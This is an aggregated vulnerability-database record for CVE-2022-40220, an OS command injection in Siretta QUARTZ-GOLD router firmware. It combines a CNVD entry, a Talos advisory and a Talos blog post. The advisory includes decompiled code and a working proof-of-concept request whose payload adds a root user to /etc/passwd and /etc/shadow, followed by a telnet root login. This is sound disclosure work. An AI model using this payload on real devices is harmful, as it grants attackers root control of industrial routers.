An OS command injection vulnerability exists in the httpd txt/restore.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability.
{"cnvd": [{"lastseen": "2023-03-15T05:25:02", "description": "Siretta QUARTZ-GOLD is a high-speed dual-port Gigabit Ethernet industrial router from Siretta.The Siretta QUARTZ-GOLD is vulnerable to an operating system command injection vulnerability that could be exploited by an attacker to cause arbitrary command execution by sending a crafted network request.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-30T00:00:00", "type": "cnvd", "title": "Siretta QUARTZ-GOLD OS Command Injection Vulnerability (CNVD-2023-17082)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-40220"], "modified": "2023-03-14T00:00:00", "id": "CNVD-2023-17082", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2023-17082", "cvss": {"score": 0.0, "vector": "NONE"}}], "talos": [{"lastseen": "2023-06-03T15:19:44", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1612\n\n## Siretta QUARTZ-GOLD httpd txt/restore.cgi OS command injection vulnerability\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-40220\n\n##### SUMMARY\n\nAn OS command injection vulnerability exists in the httpd txt/restore.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020\n\n##### PRODUCT URLS\n\nQUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-78 - Improper Neutralization of Special Elements used in an OS Command (\u2018OS Command Injection\u2019)\n\n##### DETAILS\n\nThe Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP, LTE, WAN failover, and many others.\n\nThe QUARTZ-GOLD router has a web server with several functionalities. One functionality sets several nvram variables and then reboots the router.\n\nThis functionality is allowed through the `txt/restore.cgi` API. Following one of the functions involved in executing this API:\n \n \n void wi_restore_custom(char* url,size_t len)\n \n {\n [...]\n \n read_len = len;\n [...]\n tmp_dir_path[0] = '\\0';\n data_pointer = (void *)skip_header(&read_len);\n if (data_pointer != (void *)0x0) {\n [...]\n data_pointer = malloc(read_len);\n [...]\n is_same = web_read(data_pointer,read_len);\n read_len = read_len - is_same;\n strcpy(tmp_dir_path,\"/tmp/nvram_restoreXXXXXX\");\n mktemp(tmp_dir_path);\n iVar1 = f_write(tmp_dir_path,data_pointer,is_same,0,0x180); [1]\n [...]\n tmp_dir_fd = fopen(tmp_dir_path,\"r\");\n if (tmp_dir_fd != (FILE *)0x0) {\n while (buffer = fgets(web_data,0x200,tmp_dir_fd), buffer != (char *)0x0) {\n buffer = strdup(web_data);\n if (buffer == (char *)0x0) goto LAB_00016940;\n is_same = _vstrsep(buffer,\"=\",&nvram_key,&nvram_value,0); [2]\n if ((((1 < is_same) && (is_same = strcmp(nvram_key,\"routersn\"), is_same != 0)) &&\n (is_same = strcmp(nvram_key,\"et0macaddr\"), is_same != 0)) &&\n (((is_same = strcmp(nvram_key,\"lan_hwaddr\"), is_same != 0 &&\n (is_same = strcmp(nvram_key,\"wan_hwaddr\"), is_same != 0)) &&\n (is_same = strcmp(nvram_key,\"wl0_hwaddr\"), is_same != 0)))) {\n sprintf(system_command,\"nvram set %s=%s\",nvram_key,nvram_value); [3]\n system(system_command); [4]\n memset(web_data,0,0x200);\n [...]\n }\n [...]\n }\n \n\n`wi_restore_custom` will, at `[1]`, write the request\u2019s body into a temporary file. The request\u2019s body should contain a series of lines of the `<nvaram_key>=<nvram_value>` format. Indeed, at `[2]`, a line of the request\u2019s body is parsed and split in two parts: the nvram key and the nvram value. At `[3]` the `nvram set <parsed_nvram_key>=<parsed_nvram_value>` string is composed; then it is executed at `[4]` using the `system` function.\n\nNo command injection related checks are performed on the, supposedly, `nvram_key` and the `nvram_value`. This means that any value will reach the `system` function without command injection related checks. Because of this the `wi_restore_custom` function is vulnerable to an OS command injection. This vulnerability can lead to arbitrary command execution.\n\n### Exploit Proof of Concept\n\nSending a request like the following:\n \n \n POST /txt/restore.cgi?_http_id=<a valid TID> HTTP/1.1\n Authorization: Basic <a valid basic auth>\n Content-Length: 428\n Content-Type: multipart/form-data; boundary=c6ced257295a2b54067e956663d1fbda\n \n --c6ced257295a2b54067e956663d1fbda\n Content-Disposition: form-data; name=\"content\"; filename=\"content\"\n \n AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA `echo \"\">>/etc/passwd; echo \"poc:x:0:0:root:/root:/bin/sh\" >> /etc/passwd; echo \"\" >> /etc/shadow; echo 'poc:$1$HSeR2q0g$KOjqL5H5DKyLpf0H1apr51:0:0:99999:7:0:0:'>> /etc/shadow; while [ 1 ]; do killall httpd; done`=POC\n --c6ced257295a2b54067e956663d1fbda--\n \n\nIf the request was successful, it is now possible to access the device using `poc:admin` as credentials. For instance connecting, using telnet, to port 2323 we can provide the injected credentials:\n \n \n telnet 192.168.0.1 2323\n Trying 192.168.0.1...\n Connected to 192.168.0.1.\n Escape character is '^]'.\n QUARTZ-GOLD login: poc\n Password: \n \n root@QUARTZ-GOLD:/tmp/home/root#\n \n\n##### TIMELINE\n\n2022-10-14 - Initial Vendor Contact\n\n2022-10-20 - Vendor Disclosure\n\n2022-11-24 - Vendor Patch Release\n\n2023-01-26 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1613\n\nPrevious Report\n\nTALOS-2022-1611\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T00:00:00", "type": "talos", "title": "Siretta QUARTZ-GOLD httpd txt/restore.cgi OS command injection vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-40220"], "modified": "2023-01-26T00:00:00", "id": "TALOS-2022-1612", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1612", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2023-02-02T20:12:34", "description": "\n\n_Francesco Benvenuto of Cisco Talos discovered these vulnerabilities._\n\nCisco Talos recently discovered several vulnerabilities in the Siretta Quartz-Gold router. Talos also discovered vulnerabilities in FreshTomato while investigating the Siretta router.\n\nThe Siretta Quartz-Gold is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others. FreshTomato is an open source firmware based on Linux. The firmware offers several features for Broadcom-based routers.\n\n### Quartz-Gold Vulnerabilities\n\nSeveral OS command injection vulnerabilities were found which could lead to arbitrary command execution, making them all high risk. [TALOS-2022-1607](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1607>) (CVE-2022-40969) and [TALOS-2022-1612](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1612>) (CVE-2022-40220) can be triggered with HTTP requests, while [TALOS-2022-1615](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1615>) (CVE-2022-38066), [TALOS-2022-1638](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1638>) (CVE-2022-40222) and [TALOS-2022-1640](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1640>) (CVE-2022-42490-CVE-2022-42493) can each be triggered with a network request.\n\nThree directory traversals were recorded in QUARTZ-GOLD, [TALOS-2022-1606](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1606>) (CVE-2022-40701) and [TALOS-2022-1637](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1637>) (CVE-2022-41154), which can lead to arbitrary file deletion. Advisory 1637 has a higher CVSS risk rating and can be triggered by a network request. [TALOS-2022-1609](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1609>) (CVE-2022-38088) can lead to arbitrary file read.\n\nThree stack-based buffer overflows were found: [TALOS-2022-1605](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1605>) (CVE-2022-36279) and [TALOS-2022-1608](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1608>) (CVE-2022-38459) can lead to remote code execution, triggered by an HTTP request. [TALOS-2022-1613](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1613>) (CVE-2022-40985-CVE-2022-41030) can lead to arbitrary command execution and is triggered by a sequence of requests.\n\nA heap-based buffer overflow vulnerability was also reported in [TALOS-2022-1639](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1639>) (CVE-2022-41991), which can be triggered by a network request.\n\nTwo other vulnerabilities were discovered, including [TALOS-2022-1610](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1610>) (CVE-2022-38715), a leftover debug code that can lead to remote code execution, and [TALOS-2022-1611](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1611>) (CVE-2022-39045), a file write vulnerability that can lead to arbitrary file upload. Both can be triggered by HTTP requests.\n\n### FreshTomato Vulnerabilities\n\nIn FreshTomato, there is [TALOS-2022-1641](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1641>) (CVE-2022-42484), an OS command injection vulnerability and a directory traversal vulnerability, [TALOS-2022-1642](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1642>) (CVE-2022-38451). An attacker can send an HTTP request to trigger these vulnerabilities.\n\nCisco Talos worked with Siretta and FreshTomato to ensure that these issues were resolved and an update is available for affected customers, all in adherence to [Cisco's vulnerability disclosure policy](<https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html>).\n\nUsers are encouraged to update these affected products as soon as possible: Siretta QUARTZ-GOLD G5.0.1.5-210720-141020, FreshTomato 2022.5, Siretta QUARTZ-GOLD G5.0.1.5-210720-141020, AdvancedTomato commit 67273b0. Talos tested and confirmed these versions of Siretta and FreshTomato could be exploited by these vulnerabilities.\n\nThe following Snort rules will detect exploitation attempts against this vulnerability: 60649-60652, 60656-0664, 60667, 60692, 60721-60724, 60761-60763, 60771-60775, 60846-60847, 60914. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T21:26:14", "type": "talosblog", "title": "Vulnerability Spotlight: OS command injection, directory traversal and other vulnerabilities found in Siretta Quartz-Gold and FreshTomato", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-36279", "CVE-2022-38066", "CVE-2022-38088", "CVE-2022-38451", "CVE-2022-38459", "CVE-2022-38715", "CVE-2022-39045", "CVE-2022-40220", "CVE-2022-40222", "CVE-2022-40701", "CVE-2022-40969", "CVE-2022-40985", "CVE-2022-41030", "CVE-2022-41154", "CVE-2022-41991", "CVE-2022-42484", "CVE-2022-42490", "CVE-2022-42493"], "modified": "2023-01-26T21:26:14", "id": "TALOSBLOG:5A84CD5D3B3106E07A6CAFECDC1167F6", "href": "https://blog.talosintelligence.com/vulnerability-spotlight-os-command-injection-directory-traversal-and-other-vulnerabilities-found-in-siretta-quartz-gold-and-freshtomato/", "cvss": {"score": 0.0, "vector": "NONE"}}]}
CVE-2022-40220
